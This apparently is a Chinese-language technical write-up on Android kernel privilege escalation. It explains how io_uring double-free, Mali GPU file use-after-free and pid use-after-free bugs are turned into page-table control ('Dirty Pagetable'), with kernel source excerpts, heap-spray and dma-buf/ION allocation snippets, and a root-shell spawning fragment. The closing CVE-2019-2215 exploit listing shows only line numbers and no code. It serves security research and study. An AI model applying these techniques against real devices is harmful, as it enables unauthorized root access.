Android安全-内核篇

韩乔落

基础知识

启动命令

1
2
3
4
5
6
7
8
9
emulator \
-avd Pixel_API_24 \
-show-kernel \
-verbose \
-wipe-data \
-netfast \
-kernel arch/x86_64/boot/bzImage \
-qemu \
-s

CVE 复现

CVE-2023-21400 - Double Free | DirtyPTE

CVE-2023-21400io_uring 中的 Double-Free 漏洞,影响内核 5.10

漏洞分析

io_uring中,当我们提交IOSQE_IO_DRAIN请求时,在之前提交的请求完成前,不会启动该请求。因此,推迟处理该请求,将该请求添加到io_ring_ctx->defer_list双链表中(io_defer_entry 对象)。

image-20241211175207586

竞争访问1-漏洞对象取出:之前提交的请求完成以后,就会将推迟的请求(io_defer_entry对象)从defer_list中删除。由于可以并发访问defer_list,所以访问defer_list时必须加上自旋锁。但是,有一种情况是在没有completion_lock spinlock保护的情况下访问的defer_list。在io_uring中启用了IORING_SETUP_IOPOLL时,可以通过调用 io_uring_enter(IORING_ENTER_GETEVENTS)来获取事件完成情况,所触发的调用链为 io_uring_enter()->io_iopoll_check()->io_iopoll_getevents()->io_do_iopoll()->io_iopoll_complete()->io_commit_cqring()->__io_queue_deferred()

1
2
3
4
5
6
7
8
9
10
11
12
13
// __io_queue_deferred() —— 从`ctx->defer_list`取出延迟的请求
static void __io_queue_deferred(struct io_ring_ctx *ctx)
{
do {
struct io_defer_entry *de = list_first_entry(&ctx->defer_list, // 从`ctx->defer_list`获取`io_defer_entry`对象
struct io_defer_entry, list);
if (req_need_defer(de->req, de->seq))
break;
list_del_init(&de->list);
io_req_task_queue(de->req); // 对应的请求将排队等候 task_work_run()
kfree(de);
} while (!list_empty(&ctx->defer_list));
}

竞争访问2:以上函数访问ctx->defer_list时没有获取ctx->completion_lock锁,可能导致竞争条件漏洞。因为除了__io_queue_deferred()函数,io_cancel_defer_files()函数也可以处理ctx->defer_list

io_cancel_defer_files()函数有两条触发路径:

  • do_exit()->io_uring_files_cancel()->__io_uring_files_cancel()->io_uring_cancel_task_requests()->io_cancel_defer_files()
  • execve()->do_execve()->do_execveat_common()->bprm_execve()->io_uring_task_cancel()->__io_uring_task_cancel()->__io_uring_files_cancel()->io_uring_cancel_task_requests()->io_cancel_defer_files() —— 这种方式不需要退出当前任务,因此更加可控。可选择这种方式来触发。
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
static void io_cancel_defer_files(struct io_ring_ctx *ctx,
struct task_struct *task,
struct files_struct *files)
{
struct io_defer_entry *de = NULL;
LIST_HEAD(list);
spin_lock_irq(&ctx->completion_lock);
list_for_each_entry_reverse(de, &ctx->defer_list, list) {
if (io_match_task(de->req, task, files)) {
list_cut_position(&list, &ctx->defer_list, &de->list);
break;
}
}
spin_unlock_irq(&ctx->completion_lock);
while (!list_empty(&list)) {
de = list_first_entry(&list, struct io_defer_entry, list);
list_del_init(&de->list);
req_set_fail_links(de->req);
io_put_req(de->req);
io_req_complete(de->req, -ECANCELED);
kfree(de);
}
}

构造竞争:通过以下代码来构造竞争,同时处理ctx->defer_list

race_0

改进条件竞争:竞争条件一般会触发内存损坏。对于本例会复杂一点,通常,io_cancel_defer_files()只处理当前任务创建的io_ring_ctx的延迟列表defer_list。因此,exec 任务中的io_cancel_defer_files()不会处理 iopoll 任务中相同的延迟列表。有一个例外,如果我们在exec任务中向 iopoll 任务的io_ring_ctx 提交IOSQE_IO_DRAIN请求时,就可以让exec任务进程中的io_cancel_defer_files()处理该io_ring_ctx的延迟队列。新的条件竞争如下:

race_1

在这种情况下,当exec任务和iopoll任务同时处理defer_list时,会触发内存损坏。

触发漏洞

由于竞争无法控制io_cancel_defer_files()__io_queue_deferred() 何时被触发,可通过重复执行exec任务和iopoll任务,如下所示:

race_2

两种崩溃情况

  • (1)由无效list造成。io_cancel_defer_files()__io_queue_deferred() 会竞争遍历ctx->defer_list并从中移除对象,因此ctx->defer_list可能会无效,会触发__list_del_entry_valid()导致内核崩溃。这种情况无法利用。
  • (2)由Double-Free造成。情况如下:

double_free

尝试

Android内核5.10中,io_defer_entry漏洞对象位于kmalloc-128,触发Double-Free的步骤如下:

(1)在第1次 kfree() 之前:

image-20241211184610925

(2)在第1次 kfree() 之后:

image-20241211184738724

(3)第2次 kfree() 之后:

image-20241211184803687

(4)如上所示,slab进入了非法状态:freelistnext object都指向同一空闲对象。理想情况下,我们可以从slab中分配对象两次,从而控制slab的freelist。首先,从slab中分配出一个内容可控的对象:

image-20241211185135323

(5)可见,由于分配的对象内容可控,可以让next object指向我们可控的任何虚拟地址。接着,再次从slab中分配一个对象,slab如下所示:

image-20241211185210791

让freelist指向我们可控的虚拟地址,就能轻松提权。问题是Android内核开启了CONFIG_SLAB_FREELIST_HARDENED,会混淆next object指针,由于freelist不可控而导致内核崩溃。

可利用性

目标:将Double-Free转化为UAF

UAF_1

(1)挑战 1 - 竞争窗口过小:难以在两次释放io_defer_entry之间堆喷占用空闲对象

(2)挑战 2 - 重复触发Double-Free会降低可利用性

重复速度越快,Double-Free错误触发的速度越快。在测试时,可通过添加调试代码来增大两次kfree()之间的时间窗口,

(3)解决挑战1:

UAF_0

问题是,增大了竞争窗口,能够解决挑战1,但是使得重复速度变慢,很难触发Double-Free漏洞了。增大竞争窗口和提高重复速率相矛盾了。

(4)解决挑战 2 - 通过增大ctx->defer_list双链表的长度,增大iopoll任务的遍历时间,以控制竞争点的时序

首先,作者发现ctx->defer_list可以是很长的list,因为io_uring不限制ctx->defer_listio_defer_entry对象的个数。其次,生成io_defer_entry对象很容易。根据 io_uring 稳定,我们不仅可以生成io_defer_entry对象与启用REQ_F_IO_DRAIN的请求相关联,还可以生成io_defer_entry对象与未启用REQ_F_IO_DRAIN的请求相关联。

1
2
3
4
5
IOSQE_IO_DRAIN
When this flag is specified, the SQE will not be started before previously
submitted SQEs have completed, and new SQEs will not be started before this one
completes. Available since 5.2.
当指定此标志时,SQE将不会在之前提交的SQE完成之前开始处理,新的SQE也不会在这个SQE完成之前开始。5.2开始可用

以下代码用于生成100w个io_defer_entry对象,每个对象都与一个未启用 REQ_F_IO_DRAIN 的请求相关联:

1
2
3
4
5
6
7
8
9
10
11
12
iopoll  Task
(cpu A)

A1. create a `io_ring_ctx` with IORING_SETUP_IOPOLL enabled by io_uring_setup();

A2: 提交 IORING_OP_READ 请求来读取 ext4 文件系统的文件;

A3. 在启用 REQ_F_IO_DRAIN 的情况下提交请求; // 触发生成`io_defer_entry`对象,因为还没有获取到之前的请求的CQE

A4. for (i = 0; i < 1000000; i++) {
在禁用 REQ_F_IO_DRAIN 的情况下提交请求; // 触发生成`io_defer_entry`对象,和未启用REQ_F_IO_DRAIN的请求相关联
}

由于我们能够生成非常多的io_defer_entry,且与未启用REQ_F_IO_DRAIN的请求相关联,因此可以使 __io_queue_deferred() 遍历ctx->defer_list很长一段时间。这样能使__io_queue_deferred()执行数秒钟,然后同时准确的触发执行io_cancel_defer_files(),准确触发Double-Free

(5)解决挑战 1 - 利用两次kfree()之间的代码来增大竞争窗口

现在不需要使用重复策略来触发Double-Free了,可以任意扩大 kfree()时间窗。很可惜Jann Horn[1]、Yoochan Lee、Byoungyoung Lee、Chanwoo Min[2]提出的方法都没用。那么 io_cancel_defer_files() 中是否有些代码可以帮助增大时间窗口呢?

作者发现,io_cancel_defer_files()第2次调用kfree()之前有很多唤醒操作,例如,会调用 io_req_complete() -> io_cqring_ev_posted()

1
2
3
4
5
6
7
8
9
10
11
12
13
static void io_cqring_ev_posted(struct io_ring_ctx *ctx)
{
if (wq_has_sleeper(&ctx->cq_wait)) {
wake_up_interruptible(&ctx->cq_wait); //<------------------------ wakeup the waiter (1)
kill_fasync(&ctx->cq_fasync, SIGIO, POLL_IN);
}
if (waitqueue_active(&ctx->wait))
wake_up(&ctx->wait); //<------------------------ wakeup the waiter (2)
if (ctx->sq_data && waitqueue_active(&ctx->sq_data->wait))
wake_up(&ctx->sq_data->wait); //<------------------------ wakeup the waiter (3)
if (io_should_trigger_evfd(ctx))
eventfd_signal(ctx->cq_ev_fd, 1); //<------------------------ wakeup the waiter (4)
}

exec任务有4个地方会唤醒其他任务来运行,可利用第1个来扩大时间窗口。**对 io_uring fd调用epoll_wait(),就能在ctx->cq_wait上设置一个waiter;还需要另一个epoll任务来执行epoll_wait(),这样epoll任务就能在调用wake_up_interruptible()时抢占CPU,从而在第2次调用kfree()之前暂停 io_cancel_defer_files()**。问题是,如果很快就重新执行exec任务,时间窗还是很小。解决办法是采用 Jann Horn[1] 提到的调度器策略,成功将 kfree() 窗口增大数秒。

触发Double-Free并转化为UAF的流程如下:

image-20241212103611498

提权

创建signalfd_ctx受害者对象

signalfd_ctx分配:调用signalfd()就会从 kmalloc-128 分配signalfd_ctx对象。

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
static int do_signalfd4(int ufd, sigset_t *mask, int flags)
{
struct signalfd_ctx *ctx;
......
sigdelsetmask(mask, sigmask(SIGKILL) | sigmask(SIGSTOP));// mask 值的 bit 18 和 bit 8 会被置为 1
signotset(mask);

if (ufd == -1) {
ctx = kmalloc(sizeof(*ctx), GFP_KERNEL); //<----------- 分配`signalfd_ctx`对象
if (!ctx)
return -ENOMEM;

ctx->sigmask = *mask;

/*
* When we call this, the initialization must be complete, since
* anon_inode_getfd() will install the fd.
*/
ufd = anon_inode_getfd("[signalfd]", &signalfd_fops, ctx,
O_RDWR | (flags & (O_CLOEXEC | O_NONBLOCK)));
if (ufd < 0)
kfree(ctx);
} else {
struct fd f = fdget(ufd);
if (!f.file)
return -EBADF;
ctx = f.file->private_data;
if (f.file->f_op != &signalfd_fops) {
fdput(f);
return -EINVAL;
}
spin_lock_irq(&current->sighand->siglock);
ctx->sigmask = *mask; // <---- 对 signalfd_ctx->sigmask 进行有限制的写操作
spin_unlock_irq(&current->sighand->siglock);

wake_up(&current->sighand->signalfd_wqh);
fdput(f);
}

return ufd;
}

signalfd_ctx读写操作:如上所示,在堆喷后会往signalfd_ctx开头写入8字节,但不影响利用。除了有限制的写操作,还可以通过show_fdinfo接口(procfs导出)读取signalfd_ctx的前8字节。

1
2
3
4
5
6
7
8
9
static void signalfd_show_fdinfo(struct seq_file *m, struct file *f)
{
struct signalfd_ctx *ctx = f->private_data;
sigset_t sigmask;

sigmask = ctx->sigmask;
signotset(&sigmask);
render_sigset_t(m, "sigmask:\t", &sigmask); // 读取`signalfd_ctx`的前8字节
}

**堆喷signalfd_ctx**:在两次kfree()之间,堆喷16000 signalfd_ctx 对象来占用释放的io_defer_entry对象。如果成功占据,那么第2次kfree()就会释放这个signalfd_ctx 对象,我们将其称为受害者signalfd_ctx 对象。

定位受害者signalfd_ctx 对象

思路:堆喷seq_operations对象是为了确定哪一个signalfd_ctx 对象被释放了,也即受害者signalfd_ctx 对象对应的fd,便于后面利用该fd篡改PTE。

第2次kfree()后堆喷16000个seq_operations对象,可调用single_open()来分配(打开/proc/self/status或其他procfs文件可触发single_open())。

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
int single_open(struct file *file, int (*show)(struct seq_file *, void *),
void *data)
{
struct seq_operations *op = kmalloc(sizeof(*op), GFP_KERNEL_ACCOUNT);//allocate seq_operations object
int res = -ENOMEM;

if (op) {
op->start = single_start;
op->next = single_next;
op->stop = single_stop;
op->show = show;
res = seq_open(file, op);
if (!res)
((struct seq_file *)file->private_data)->private = data;
else
kfree(op);
}
return res;
}

如果堆喷的seq_operations对象占据了某个释放的signalfd_ctx对象,如下所示:

image-20241212105009300

方法:通过读取所有信号fd的fdinfo,如果其fdinfo与初始化不同,说明其前8字节被覆盖成了seq_operations的内核地址。该fd和受害者signalfd_ctx对象相关联。这样就定位到了受害者signalfd_ctx 对象

回收受害者signalfd_ctx 对象所在的slab

方法:关闭所有信号fd和/proc/self/status fd,除了受害者signalfd_ctx 对象对应的fd,这样受害者signalfd_ctx对象所在的slab变空,会被页分配器所回收。

用户页表占据受害者slab

目标:堆喷用户页表来占据受害者slab,并定位受害者signalfd_ctx对象的位置。

由于kmalloc-128 slab使用的是1-page,且用户页表也是1-page,这样可以堆喷用户页表来占据受害者slab。如果成功则如下图所示:

image-20241212110909838

可见,通过写入受害者signalfd_ctx对象的前8字节,可以控制用户页表的某个PTE。将PTE的物理地址设置为内核text/data的物理地址,就能修改内核text/data数据。

页表喷射步骤如下:

(1)调用mmap()在虚拟地址空间中创建一块大内存区域

内存区域大小:因为每个末级页表描述了2M的虚拟内存(512*4096),所以如果要喷射512个用户页表,必须调用 mmap() 创建512*2M大小的内存区域。

内存区域计算 —— 内存区域大小 = 页表数量 * 2MiB

起始虚拟地址:起始虚拟地址需与2M(0x200000)对齐。原因是,现在我们只能控制signalfd_ctx的前8字节,并且不知道受害者signalfd_ctx对象在slab中具体位置,可能位于中间。0x200000对齐的起始虚拟地址能确保该地址对应的PTE位于页表的前8个字节。这样在第3步之后页表将如下所示:

image-20241212112730734

(2)页表分配

分配方法:上一步已经创建了内存区域,现在可以从起始虚拟地址开始每隔0x200000字节执行一次写操作,确保内存区域对应的所有用户页表都被分配。即可堆喷用户页表。

1
2
3
4
unsigned char *addr = (unsigned char *)start_virtual_address;
for (unsigned int i = 0; i < size_of_memory_region; i+= 0x200000) {
*(addr + i) = 0xaa;
}

(3)在页表中定位受害者signalfd_ctx对象

在第2步以后,我们只能确保每个页表的第1个PTE有效。因为受害者signalfd_ctx对象可以位于页表中与 128 对齐的任何偏移处,所以必须验证位于页表中所有与128对齐的偏移处的PTE。因此,我们从起始虚拟地址开始,每隔16K字节(每个page含有32个signalfd_ctx对象,对象大小为128字节,128 / 8 * 4096 = 16 page,这里的16K小了,但也能达到目的)进行一次写操作。最终的页表如上图所示。

定位方法:通过读取受害者信号fd的fdinfo,可以泄露受害者signalfd_ctx对象的前8个字节。如果能成功读取一个有效的PTE值,说明成功的用用户页表占用了受害者slab。否则,unmap() 该区域,重映射更大的内存,重复步骤(1)~(3)。

patch内核并提权

现在可通过受害者signalfd_ctx对象控制PTE,下面通过将PTE的物理地址设置为内核text/data地址,patch内核并提权。

(1)定位PTE对应的用户虚拟地址

目的:虽然现在可以控制用户页表的一个PTE,但是还不知道该PTE对应的用户虚拟地址。只有知道了该PTE对应的虚拟地址,才能通过写入该用户虚拟地址来patch内核的text/data

方法:为了定位该PTE对应的用户虚拟地址,需将该PTE的物理地址修改为其他物理地址。然后遍历之前映射的所有虚拟地址,检查是否有一个虚拟地址上的值不是之前设置的初始值(0xaa)。如果找到这样一个虚拟地址,则说明就是PTE对应的虚拟地址。

image-20241212114500993

写限制:受害者signalfd_ctx对象的写入能力有限(写入值的bit 18和bit 8被设置为1),无法对内核任意地址进行patch。一个普通PTE对应的用户虚拟地址为0xe800098952ff43,其bit 8总是为1,但是bit 18位于PTE的物理地址中,所以只能对bit 18为1的物理地址进行patch。

该限制是由do_signalfd4()中的sigdelsetmask(mask, sigmask(SIGKILL) | sigmask(SIGSTOP));语句所导致,是否可以对该语句打patch呢?

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
static int do_signalfd4(int ufd, sigset_t *mask, int flags)
{
struct signalfd_ctx *ctx;
......
sigdelsetmask(mask, sigmask(SIGKILL) | sigmask(SIGSTOP)); // 将mask中的bit 18和bit 8设置为1
signotset(mask);

if (ufd == -1) {
......
} else {
struct fd f = fdget(ufd);
if (!f.file)
return -EBADF;
ctx = f.file->private_data;
if (f.file->f_op != &signalfd_fops) {
fdput(f);
return -EINVAL;
}
spin_lock_irq(&current->sighand->siglock);
ctx->sigmask = *mask; // <----- 对signalfd_ctx进行有限制的写操作
spin_unlock_irq(&current->sighand->siglock);

wake_up(&current->sighand->signalfd_wqh);
fdput(f);
}

return ufd;
}

do_signalfd4()的物理地址的 bit 18 恰好为1,因此可patch sigdelsetmask(mask, sigmask(SIGKILL) | sigmask(SIGSTOP)); 语句。如何找到内核某函数的物理地址?

(3)对内核打补丁

目标是对selinux_statesetresuid()/setresgid()等函数打补丁,以提权 Google Pixel 7。由于只有一个PTE可控,所以需要多次修改PTE的物理地址。

(4)调用setresuid()setresgid()提权

1
2
3
4
5
6
7
8
9
10
if (setresuid(0, 0, 0) < 0) {
perror("setresuid");
} else {
if (setresgid(0, 0, 0) < 0) {
perror("setresgid");
} else {
printf("[+] Spawn a root shell\n");
system("/system/bin/sh");
}
}

最终在Google Pixel 7上成功提权:

pic13_pixel7_root

CVE-2022-28350 - file UAF | DirtyPTE

file UAF现有利用方法

file UAF漏洞最近比较流行,主要有3种利用方法:

  • (1)获取已释放的受害者file对象,供新打开的特权文件重用,例如/etc/crontab,之后就能写入特权文件提权。Jann Horn[1]、Mathias Krause[5]、Zhenpeng Lin[6]和作者[7]用到了本方法。缺点有3个,一是在新内核上必须赢得竞争,有一定技巧性和概率性;二是Android上无法写入高权限文件,因为这些文件位于只读文件系统中;三是无法逃逸容器。
  • (2)攻击系统库或可执行文件的页缓存, Xingyu Jin、Christian Resell、Clement Lecigne、Richard Neal[8] 和 Mathias Krause[9]用到了本方法。利用该方法可向libc.so等系统库中注入恶意代码,当特权进程执行libc.so时将以特权用户的身份执行恶意代码,利用结果类似于DirtyPipe。优点是不需要竞争,稳定性较好,但是要想在Android上完整提权或逃逸容器还很复杂,且不适用于其他类型的UAF漏洞。
  • (3)Cross-cache 利用。Yong Wang[10] 和 Maddie Stone[11] 都用到了本方法。提权之前都需要绕过KASLR,Yong Wang[10] 通过重复使用 syscall 代码来猜测 kslides 绕过了KASLR,Maddie Stone[11] 通过另一个信息泄露漏洞绕过了KASLR。绕过KASLR之后,他们伪造了一个file对象来构造内核读写原语。缺点是需要绕过KASLR。

脏页表方法利用file UAF

以CVE-2022-28350和内核版本为5.10的Android为例,介绍Dirty Pagetable的工作原理。

介绍:位于ARM Mali GPU驱动中的 file UAF 漏洞,影响Android 12 和 Android 13。漏洞原因如下。

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
static int kbase_kcpu_fence_signal_prepare(...) {
...
/* create a sync_file fd representing the fence */
sync_file = sync_file_create(fence_out); //<------ 创建 file 对象
if (!sync_file) {
...
ret = -ENOMEM;
goto file_create_fail;
}

fd = get_unused_fd_flags(O_CLOEXEC); //<------ 获取未使用的 fd
if (fd < 0) {
ret = fd;
goto fd_flags_fail;
}

fd_install(fd, sync_file->file); //<------ 将 file 对象和 fd 关联起来

fence.basep.fd = fd;
...
if (copy_to_user(u64_to_user_ptr(fence_info->fence), &fence,
sizeof(fence))) {
ret = -EFAULT;
goto fd_flags_fail; //<------ 进入本分支
}

return 0;

fd_flags_fail:
fput(sync_file->file); //<------ 释放 file 对象
file_create_fail:
dma_fence_put(fence_out);

return ret;
}

可见,调用 fd_install()file 对象与 fd 关联起来。通过copy_to_user()将fd传递到用户空间,但如果拷贝失败,将释放 file 对象,导致一个有效的fd和已释放的file对象关联起来:

image-20241212141229425

回收受害者slab

释放受害者slab上所有对象后,页分配器会回收该slab。

用户页表占据受害者slab

Android上 filp slab的大小是2-page,而用户页表大小是1-page。虽然二者大小不同,但是堆喷用户页表来占用受害者slab的成功率几乎是100%,占用成功后内存布局如下:

image-20241212152733071

递增原语+定位受害者PTE对应的虚拟用户地址

递增原语:目的是构造写原语来篡改PTE。受害者file对象被用户页表所覆写,对该file对象进行操作可能导致内核崩溃。但是作者发现,调用 dup() 将file对象的f_count递增1,不会触发崩溃,问题是 dup() 会消耗fd资源,单个进程最多打开32768个fd,所以f_count最多递增32768。作者又发现fork()+dup()可突破该限制,先调用fork(),会将受害者file对象的f_count加1,子进程中可将f_count增加32768。由于可以多次重复fork()+dup(),所以成功突破限制。

PTE与f_count重叠:下一步是让受害者PTE的位置与f_count重合,这样就能利用递增原语来控制PTE。

file对象的对齐大小为320字节,f_count的偏移是56,占8字节。

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
(gdb) ptype /o struct file
/* offset | size */ type = struct file {
/* 0 | 16 */ union {
/* 8 */ struct llist_node {
/* 0 | 8 */ struct llist_node *next;

/* total size (bytes): 8 */
} fu_llist;
/* 16 */ struct callback_head {
/* 0 | 8 */ struct callback_head *next;
/* 8 | 8 */ void (*func)(struct callback_head *);

/* total size (bytes): 16 */
} fu_rcuhead;

/* total size (bytes): 16 */
} f_u;
/* 16 | 16 */ struct path {
/* 16 | 8 */ struct vfsmount *mnt;
/* 24 | 8 */ struct dentry *dentry;

/* total size (bytes): 16 */
} f_path;
/* 32 | 8 */ struct inode *f_inode;
/* 40 | 8 */ const struct file_operations *f_op;
/* 48 | 4 */ spinlock_t f_lock;
/* 52 | 4 */ enum rw_hint f_write_hint;
/* 56 | 8 */ atomic_long_t f_count;
/* 64 | 4 */ unsigned int f_flags;
......
......
/* 288 | 8 */ u64 android_oem_data1;

/* total size (bytes): 296 */
}

filp cache的slab大小为2-page,一个filp cache的slab中有25个file对象,slab的结构如下所示:

image-20241212154726436

由于受害者file对象有25个可能的位置,为确保受害者file对象的f_count和受害者PTE恰好重合,需准备如下用户页表:

image-20241212155128279

识别PTE对应的用户虚拟地址:现在我们能使受害者file对象的f_count与一个有效的PTE重合了,这个有效的PTE就是受害者PTE。如何找到受害者PTE对应的用户虚拟地址呢?可利用递增原语。

在利用递增原语之前,页表和相应的用户虚拟地址应该如下所示:可以看到,为了区分每个用户虚拟地址对应的物理页,作者将虚拟地址写在每个物理页的前8字节,作为标记。由于用户虚拟地址对应的所有物理页都是一次性分配的,因此它们的物理地址很可能是连续的。

image-20241212160223196

如果我们利用递增原语将受害者PTE增加0x1000,就会改变与受害者PTE对应的物理页,如下所示:受害者PTE和另一个有效的PTE对应同一个物理页!现在可遍历所有虚拟页,检查前8字节是不是其虚拟地址,若不是,则该虚拟页就是受害者PTE对应的虚拟页。

image-20241212161417467

堆喷占用页表

问题:现在找到了受害者PTE,且有递增原语。可将受害者PTE对应的物理地址设置为内核text/data的物理地址,但是mmap() 分配的内存对应的物理地址大于内核text/data的物理地址,而且递增原语有限,无法溢出受害者PTE。解决办法是使PTE指向某个用户页表,通过间接篡改用户页表,来篡改物理内存

策略 1:现在已经让受害者PTE和另一有效PTE指向同一物理页,那么如果我们调用munmap()解除另一有效PTE的虚拟页映射,并触发物理页的释放,会发生什么?page UAF!再用用户页表占据释放页,就能控制用户页表。但问题是,很难堆喷用户页表来占据释放页。原因是,匿名 mmap() 分配的物理页来自内存区的MIGRATE_MOVABLE free_area,而用户页表是从内存区的MIGRATE_UNMOVABLE free_area分配,所以很难通过递增PTE使之指向另一用户页表。参考[10]解释了这一点。

策略 2:新策略能够捕获用户页表,步骤如下。本质是采用另一种方式来分配物理页,使该物理页和用户页表来自同一内存区域,这样如果受害者PTE指向该物理页,就能通过递增该PTE,使该PTE指向某个用户页表

(1)对共享页和用户页表进行 heap shaping

目的:由于共享页和用户页表位于同一种内存,可将共享页嵌入到众多用户页表当中。

共享物理页:通常,内核空间和用户空间需要共享一些物理页,从两个空间都能访问到。有些组件可用于分配这些共享页,例如 dma-buf heaps, io_uring, GPUs 等。

分配共享物理页:作者选用 dma-buf 系统堆来分配共享页,因为可以从Android中不受信任的APP来访问/dev/dma_heap/system,并且 dma-buf 的实现相对简单。通过 open(/dev/dma_heap/system) 可获得一个 dma heap fd,然后用以下代码分配一个共享页:

1
2
3
4
5
6
7
8
9
10
11
12
struct dma_heap_allocation_data data;

data.len = 0x1000;
data.fd_flags = O_RDWR;
data.heap_flags = 0;
data.fd = 0;

if (ioctl(dma_heap_fd, DMA_HEAP_IOCTL_ALLOC, &data) < 0) {
perror("DMA_HEAP_IOCTL_ALLOC");
return -1;
}
int dma_buf_fd = data.fd;

由用户空间中的 dma_buf fd来表示一个共享页,可通过mmap() dma_buf fd 将共享页映射到用户空间。从 dma-buf 系统堆分配的共享页本质上是从页分配器分配的(实际上 dma-buf 子系统采用了页面池进行优化,对于本利用没有影响)。用于分配共享页的 gfp_flags 如下所示:

1
2
3
4
5
#define HIGH_ORDER_GFP  (((GFP_HIGHUSER | __GFP_ZERO | __GFP_NOWARN \ 	// HIGH_ORDER_GFP 用于 order-8和order-4 page
| __GFP_NORETRY) & ~__GFP_RECLAIM) \
| __GFP_COMP)
#define LOW_ORDER_GFP (GFP_HIGHUSER | __GFP_ZERO | __GFP_COMP) // LOW_ORDER_GFP 用于 order-0 page
static gfp_t order_flags[] = {HIGH_ORDER_GFP, HIGH_ORDER_GFP, LOW_ORDER_GFP};

共享页分配vs页表分配:从LOW_ORDER_GFP可以看出,单个共享页是从内存的MIGRATE_UNMOVABLE free_area中分配的,和页表分配的出处一样。且单个共享页为order-1 (order-0 ?),和页表的order相同。结论是,单个共享页和页表都是从同一migrate free_cache中分配,且order相同

通过以下步骤,就能获得下图中单个共享页和用户页表的布局:

1
2
3
step1:分配3200个用户页表
step2:使用dma-buf系统堆分配单个共享页面
step3:分配3200个用户页表

image-20241213101331895

(2)取消与受害者 PTE 对应的虚拟地址的映射,并将共享页映射到该虚拟地址

目标:由于共享页和页表位于同种内存,所以需要将受害者PTE从原先的物理页映射到共享物理页。

方法:可通过mmap() dma_buf fd 将共享页映射到用户空间,因此可先munmap() 受害者PTE对应的虚拟地址,然后将单个共享页映射到该虚拟地址。如下图所示:

image-20241213115619059

(3)利用递增原语捕获用户页表

现在,我们利用递增原语对受害者PTE增加0x1000、0x2000、0x3000,有很大机率使受害者PTE对应到另一用户页表。如下图所示:

image-20241213115657335

现在已经控制了一个用户页表。通过修改用户页表中的PTE,就能修改内核 text/data,即可提权:

pic23_file_uaf_root

CVE-2020-29661 - pid UAF | DirtyPTE

介绍:CVE-2020-29661属于pid UAF漏洞,已被Jann Horn[12]和Yong Wang[10]利用。Jann Horn在Debian上通过控制用户页表来修改只读文件(例如,setuid二进制文件)的页缓存,缺点是无法逃逸容器,且不能绕过Android上的SELinux防护。

作者采用Dirty Pagetable的方法重新利用了CVE-2020-29661,能在含有内核4.14的Google Pixel 4上提权。pid UAF 和 file UAF 都使用类似的增递增原语来操作 PTE。以下只介绍关键步骤。

脏页表方法利用CVE-2020-29661

与file UAF类似,在触发CVE-2020-29661并释放受害者slab中的所有其他pid对象后,用用户页表占用受害者slab。如下图所示,受害者pid对象位于用户页表中:

image-20241213120838440

利用pid UAF构造递增原语

目标:利用递增原语篡改受害者PTE。

选取受害者pid对象的count成员与有效PTE重合,count位于pid对象的前4字节(8字节对齐):

1
2
3
4
5
6
7
8
9
10
11
12
13
struct pid
{
refcount_t count; //<------------- 4 bytes, aligned with 8
unsigned int level;
spinlock_t lock;
/* lists of tasks that use this pid */
struct hlist_head tasks[PIDTYPE_MAX];
struct hlist_head inodes;
/* wait queue for pidfd notifications */
wait_queue_head_t wait_pidfd;
struct rcu_head rcu;
struct upid numbers[1];
};

尽管 count 字段只有4字节,但是与PTE的低4字节重合。Jann horn[12] 之前基于 count 构造了递增原语,但是限制也是由于fd资源有限,可通过 fork() 在多个进程中执行递增原语,突破限制。

分配共享页

内核4.14中没有 dma-buf,可通过ION来分配共享页,ION更加方便,因为可通过设置ION的flag直接从页分配器分配共享页。分配代码如下:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
#if LEGACY_ION
int alloc_pages_from_ion(int num) {

struct ion_allocation_data data;
memset(&data, 0, sizeof(data));

data.heap_id_mask = 1 << ION_SYSTEM_HEAP_ID;
data.len = 0x1000*num;
data.flags = ION_FLAG_POOL_FORCE_ALLOC;
if (ioctl(ion_fd, ION_IOC_ALLOC, &data) < 0) {
perror("ioctl");
return -1;
};

struct ion_fd_data fd_data;
fd_data.handle = data.handle;
if (ioctl(ion_fd, ION_IOC_MAP, &fd_data) < 0) {
perror("ioctl");
return -1;
}
int dma_buf_fd = fd_data.fd;
return dma_buf_fd;
}
#else
int alloc_pages_from_ion(int num) {

struct ion_allocation_data data;
memset(&data, 0, sizeof(data));

data.heap_id_mask = 1 << ION_SYSTEM_HEAP_ID;
data.len = 0x1000*num;
data.flags = ION_FLAG_POOL_FORCE_ALLOC;
if (ioctl(ion_fd, ION_IOC_ALLOC, &data) < 0) {
perror("ioctl");
return -1;
}

int dma_buf_fd = data.fd;

return dma_buf_fd;
}
#endif

共享页由用户空间中的dma_buf_fd 表示,可通过 mmap() dma_buf_fd 将共享页映射到用户空间。

Google Pixel 4提权

成功提权:

pic25_root_pixel4

CVE-2019-2215 - Binder UAF

exploit

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
156
157
158
159
160
161
162
163
164
165
166
167
168
169
170
171
172
173
174
175
176
177
178
179
180
181
182
183
184
185
186
187
188
189
190
191
192
193
194
195
196
197
198
199
200
201
202
203
204
205
206
207
208
209
210
211
212
213
214
215
216
217
218
219
220
221
222
223
224
225
226
227
228
229
230
231
232
233
234
235
236
237
238
239
240
241
242
243
244
245
246
247
248
249
250
251
252
253
254
255
256
257
258
259
260
261
262
263
264
265
266
267
268
269
270
271
272
273
